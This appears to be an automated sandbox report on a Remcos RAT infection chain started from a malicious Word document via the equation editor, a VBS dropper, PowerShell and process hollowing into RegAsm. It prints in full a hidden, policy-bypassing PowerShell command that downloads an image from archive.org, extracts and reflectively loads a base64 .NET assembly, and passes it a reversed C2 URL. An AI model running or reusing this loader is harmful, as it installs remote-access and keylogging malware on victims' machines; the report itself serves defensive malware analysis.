                          Expires: Fri, 06 Sep 2024 15:26:02 GMT
                          Cache-Control: max-age=21600
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                          Access-Control-Allow-Credentials: true
                          Accept-Ranges: bytes
                          Onion-Location: https://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_image_vbs.jpg
                          Referrer-Policy: no-referrer-when-downgrade


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:05:25:54
                          Start date:06/09/2024
                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                          Imagebase:0x13fc30000
                          File size:1'423'704 bytes
                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:1
                          Start time:05:25:55
                          Start date:06/09/2024
                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                          Imagebase:0x400000
                          File size:543'304 bytes
                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:05:25:57
                          Start date:06/09/2024
                          Path:C:\Windows\SysWOW64\wscript.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS"
                          Imagebase:0xac0000
                          File size:141'824 bytes
                          MD5 hash:979D74799EA6C8B8167869A68DF5204A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:05:25:58
                          Start date:06/09/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 blob elided]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                          Imagebase:0xff0000
                          File size:427'008 bytes
                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:05:25:59
                          Start date:06/09/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                          Imagebase:0xff0000
                          File size:427'008 bytes
                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:05:26:04
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:high
                          Has exited:false

                          Target ID:11
                          Start time:05:26:09
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:12
                          Start time:05:26:09
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rtrfuoyfiupqcguozzwaq"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:13
                          Start time:05:26:09
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:14
                          Start time:05:26:09
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:15
                          Start time:05:26:17
                          Start date:06/09/2024
                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                          Imagebase:0x400000
                          File size:543'304 bytes
                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                            Memory Dump Source
                            • Source File: 00000005.00000002.368330186.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_1ed000_powershell.jbxd

                            Execution Graph

                            Execution Coverage:11.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:20%
                            Total number of Nodes:25
                            Total number of Limit Nodes:1
                            execution_graph (edge list omitted): the graphed nodes call WriteProcessMemory, CreateProcessA, Wow64SetThreadContext and ResumeThread

                            Control-flow Graph (basic-block edge list omitted)
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd

                            Control-flow Graph (basic-block edge list omitted)
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: L4#p$L4#p$L4#p$d=(
                            • API String ID: 0-82004000
                            • Opcode ID: e7055504c682598382b629e24b11ed39e01b102391f566aa31ee18fecc9c3f99
                            • Instruction ID: 023666fea52a710026de4ac3e9c08349cedea2b6bb56e3ec84a2f0eb3b362a3a
                            • Opcode Fuzzy Hash: e7055504c682598382b629e24b11ed39e01b102391f566aa31ee18fecc9c3f99
                            • Instruction Fuzzy Hash: 74C13535B20249DFDB159F64C8407AEB7A2AFE4311F14C0ABE9159B391CB70CD69CB61

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: X2$X2$l;($l;(
                            • API String ID: 0-1947097442
                            • Opcode ID: 7cfe76f6d8fcb3278ab7ac700a93f5fe8535fff0a3984c7c240d06a44f345ed5
                            • Instruction ID: 372dbe775fa05357b5c569468f53ea818c506e87834016757199528ec9494806
                            • Opcode Fuzzy Hash: 7cfe76f6d8fcb3278ab7ac700a93f5fe8535fff0a3984c7c240d06a44f345ed5
                            • Instruction Fuzzy Hash: 32F14731B242069FDB249F7988807BABBA2EFD0310F24846BD455CB3A1DB71CD61C762

                            Control-flow Graph

                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00256090
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 271fd37af6c4f2e04c4747b32e1fb4c81498eac900c3c0f84764957530c636c8
                            • Instruction ID: 644358a3ce5285ab923158543fee3b696531deedabee2cb17fe8f2a5a05259d8
                            • Opcode Fuzzy Hash: 271fd37af6c4f2e04c4747b32e1fb4c81498eac900c3c0f84764957530c636c8
                            • Instruction Fuzzy Hash: D3C14A70D1062A8FEF10DFA4C845BEDBBB1BF45304F0091A9E819B7290DB749A99CF95

                            Control-flow Graph

                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00256090
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: e50af7600a34f32af19cfd24fdcdabb4e2f0a03cc2e426f2304d7cd1f4fc3766
                            • Instruction ID: 158c08e5a5ed0e17052751445fdf6f358325d6c75048882203f043506dedc0c6
                            • Opcode Fuzzy Hash: e50af7600a34f32af19cfd24fdcdabb4e2f0a03cc2e426f2304d7cd1f4fc3766
                            • Instruction Fuzzy Hash: 1EC14970D1062A8FDF14DFA4C845BEEBBB1BF45304F0091A9E819B7280DB749A99CF95

                            Control-flow Graph

                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00255B1B
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 7e757926182a647dbb7866d5123d7ff90b4bb72d7e2da885dbf83ad28fe8b5ea
                            • Instruction ID: 99cad51fecae59a81c39fb0f3025b710ddc4900849b86508aa3b26f6e7aa20cc
                            • Opcode Fuzzy Hash: 7e757926182a647dbb7866d5123d7ff90b4bb72d7e2da885dbf83ad28fe8b5ea
                            • Instruction Fuzzy Hash: C541B9B4D112588FCF00CFA9D984AEEBBF1BF49314F20902AE814BB250C374AA55CF58

                            Control-flow Graph

                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00255B1B
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: ef96a8eea6153bfb29779fe9f1f72277a9e58aed105c87f4aae6703fd2572a75
                            • Instruction ID: ddb98ee765f0925c3cd268975171e33e329e35e95219dd15fac1b4891c3161db
                            • Opcode Fuzzy Hash: ef96a8eea6153bfb29779fe9f1f72277a9e58aed105c87f4aae6703fd2572a75
                            • Instruction Fuzzy Hash: 3A41BBB4D102189FCF00CFA9D984AEEFBF1BB49314F20902AE814B7250D334AA55CF54

                            Control-flow Graph

                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 002558AF
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: ed49b0b57765cf3bb3ce9bd109a660857da703c2e9b63cf581320f41160149f3
                            • Instruction ID: bdd54ee9fbbc888ac9c3584fd2853d5c3e89157512427c72349e85b279349646
                            • Opcode Fuzzy Hash: ed49b0b57765cf3bb3ce9bd109a660857da703c2e9b63cf581320f41160149f3
                            • Instruction Fuzzy Hash: 7141DEB4D112589FDB10DFA9D884AEEFBF1BF49314F24842AE814B7240D738AA49CF54

                            Control-flow Graph

                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 002558AF
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 177ff8f4256b6296f077e71b5f14624247b4ddd52dfeb202f1305ade46d7a02f
                            • Instruction ID: 141a6e4e7eff8e5389c9413f10f90d8826988a553ddd2228fdd1d9f3b8b68f2f
                            • Opcode Fuzzy Hash: 177ff8f4256b6296f077e71b5f14624247b4ddd52dfeb202f1305ade46d7a02f
                            • Instruction Fuzzy Hash: 5931CEB4D102589FDB10DFA9D884AEEFBF1BF48314F24802AE814B7240D778AA49CF54

                            Control-flow Graph

                            APIs
                            • ResumeThread.KERNELBASE(?), ref: 0025578E
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 4894c219860e08de4c88422c1bdd604abd628e9c5008271a7a05503624ea1e80
                            • Instruction ID: 3eb1501a64a997e7367773a342908881bf831713f031a1fd8cb955cf2401f853
                            • Opcode Fuzzy Hash: 4894c219860e08de4c88422c1bdd604abd628e9c5008271a7a05503624ea1e80
                            • Instruction Fuzzy Hash: 2731EDB4D102189FCB10DFA9D884AEEFBF5AF89310F20842AE814B7300C735A904CF58

                            Control-flow Graph

                            APIs
                            • ResumeThread.KERNELBASE(?), ref: 0025578E
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 14ef39367eda3ca2b6cf291ef0059dd140a5e6fd29c9b23a04bc4d8d0e7f063f
                            • Instruction ID: fe9a9757994b9fb9ea180915d0efe9a647f117ddc0f448409e999b0aa9ed0724
                            • Opcode Fuzzy Hash: 14ef39367eda3ca2b6cf291ef0059dd140a5e6fd29c9b23a04bc4d8d0e7f063f
                            • Instruction Fuzzy Hash: 2D31ACB4D102189FCB14DFA9D984AEEFBB5AF89314F20942AE814B7340C774A905CF59

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f146a270fa5454eeda48bfc49868db951b7da25aaedadc6149b3e4f9a51bdca6
                            • Instruction ID: f8eb7fe8ad48fff102431eb08cf1fc7a123ce05b234117d8a702d11063740fab
                            • Opcode Fuzzy Hash: f146a270fa5454eeda48bfc49868db951b7da25aaedadc6149b3e4f9a51bdca6
                            • Instruction Fuzzy Hash: 20414935724242EBEB298E6494401BAF3A1AF91310B3885ABD861CB7A1D7B0CD75D712
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d94ccc218859cb6c318f1d44196969da7f93e5cabd74064f82fe23815afec1e
                            • Instruction ID: 1f3cc56f27397c9a5254c44474fe0725c7172c92e61e48fded4688c727a517b0
                            • Opcode Fuzzy Hash: 5d94ccc218859cb6c318f1d44196969da7f93e5cabd74064f82fe23815afec1e
                            • Instruction Fuzzy Hash: B111343AB60206AFDF245A64D4112FDF351ABD4324B20C56BC9A58BB90EB31CD72C792
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af2a0242d3e0a6f219e43db0cb32848e35d5053cbb5f0a7958d735dc86fe77fd
                            • Instruction ID: 494a84d87c84994201efc8912227bc00e4150b3c607ebf25459ca75dc0a8bc36
                            • Opcode Fuzzy Hash: af2a0242d3e0a6f219e43db0cb32848e35d5053cbb5f0a7958d735dc86fe77fd
                            • Instruction Fuzzy Hash: D0117F31A2020A8FCB64DE65C4807AABBE5EF94360F248467D41897371E7B1DDA1CBA1
                            Memory Dump Source
                            • Source File: 00000007.00000002.364585538.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_1dd000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f208e486f5e6360ee870fa4a69e854d6e52e5c425ce0408e2cbf9ad79c87fb86
                            • Instruction ID: 42b5bf34f5d5c5b0d43a3ed443b050cd25ca1f66905267d9d213eb66a9c651c7
                            • Opcode Fuzzy Hash: f208e486f5e6360ee870fa4a69e854d6e52e5c425ce0408e2cbf9ad79c87fb86
                            • Instruction Fuzzy Hash: BB01DF31504340ABE7205A25ECC4B66BB98DBC1364F28C01AED480E382D3799945DAB1
                            Memory Dump Source
                            • Source File: 00000007.00000002.364585538.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_1dd000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a5eb6f148f7a7c301ebfdf3ebe9f7c81f6249057645f93ae4aa81b663e81ef4
                            • Instruction ID: c119e6f3c9c854c2f7d9c8e614a68e956370316a6b26f976079c1ab82777b654
                            • Opcode Fuzzy Hash: 7a5eb6f148f7a7c301ebfdf3ebe9f7c81f6249057645f93ae4aa81b663e81ef4
                            • Instruction Fuzzy Hash: 6101716150D3C09FD7128B259C94B52BFB4DF53224F1981DBE9888F2A3D2699C48C772
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b3550dd6756801fd5870fb68686d41d447a630883958d89541fb423536955c8
                            • Instruction ID: 0dbdfe8fb6640b6d024e02ebfd833e1ff853a945722cbfd2ecccd32dfc4facbc
                            • Opcode Fuzzy Hash: 9b3550dd6756801fd5870fb68686d41d447a630883958d89541fb423536955c8
                            • Instruction Fuzzy Hash: 94510FB0D106588FDB10DFA9C895B9EFBF5EF49304F20812AE814AB250D7749949CF49
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ef5a354d3cc03b96f3d1cbf87515d6346347bd5cff0ffa315cf204e3b772eb30
                            • Instruction ID: f7787453a2fe021d5f44c2db82b8be90d341d6d9b8237b1a77ba9d3b5fe00fbf
                            • Opcode Fuzzy Hash: ef5a354d3cc03b96f3d1cbf87515d6346347bd5cff0ffa315cf204e3b772eb30
                            • Instruction Fuzzy Hash: 6441EBB0D106588FDB10DFA9C995B9EFBF5AF49304F20902AE824AB250D774A949CF49
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2609a5eeee126731b381993f8504f851782342bac77143d9f4da76720a296891
                            • Instruction ID: 5e678109feb3a7c7989d769647d6bb7285f7a264e3f933e5cf0d67b160a3c831
                            • Opcode Fuzzy Hash: 2609a5eeee126731b381993f8504f851782342bac77143d9f4da76720a296891
                            • Instruction Fuzzy Hash: AE31951140E3C06FDB07A77948B00A67FB0AE9321530F64E3C4D0CF5A3E609892ED36A
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (:($(:($(:($L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:($L:($L:(
                            • API String ID: 0-196646589
                            • Opcode ID: 273c5cb95f0cdd2a5795dd4c520c646f3a4ba52f5cafbba483600fcd2da148fd
                            • Instruction ID: 000c6de1e9ef6ba9f24ea2f946bc1809890501f8ba929c5b96b69f2803988bba
                            • Opcode Fuzzy Hash: 273c5cb95f0cdd2a5795dd4c520c646f3a4ba52f5cafbba483600fcd2da148fd
                            • Instruction Fuzzy Hash: E6D12531B10249AFDF159E64D884BBE77A2AFC0310F14806BE9159B3A2CBB0DD55CB62
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (:($(:($L4#p$L4#p$L4#p
                            • API String ID: 0-1960093006
                            • Opcode ID: 14ee3c2b359d68aacd54a1ebf3459b7bcdc81687d3fd5c8a0b85b129f75052a2
                            • Instruction ID: 633cb868b334aff7fa12a4bb4c8badc6e9c0e0a2aa342efe838a7a02ff20ef60
                            • Opcode Fuzzy Hash: 14ee3c2b359d68aacd54a1ebf3459b7bcdc81687d3fd5c8a0b85b129f75052a2
                            • Instruction Fuzzy Hash: B1513731A19385AFDB128F24C8947A97FB1AF82300F1981A7E8449B3F2C7B4DD55CB52
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (:($(:($L4#p$L4#p$L4#p
                            • API String ID: 0-1960093006
                            • Opcode ID: 22019d45406a0a8b2e5af08886954c8f87ccf81838a815b9df946e143b3a19e4
                            • Instruction ID: 6894c92c82c4b9772a55ef143fdb9c3f4d41f95589d02b15674bfdf409e94eb8
                            • Opcode Fuzzy Hash: 22019d45406a0a8b2e5af08886954c8f87ccf81838a815b9df946e143b3a19e4
                            • Instruction Fuzzy Hash: 0541E331624249AFDF158F14C8887BD7BA1AF81300F5980A7E8549B3F2C7B4DD95CB51

                            Execution Graph

                            Execution Coverage:5.7%
                            Dynamic/Decrypted Code Coverage:19.7%
                            Signature Coverage:4%
                            Total number of Nodes:1515
                            Total number of Limit Nodes:43
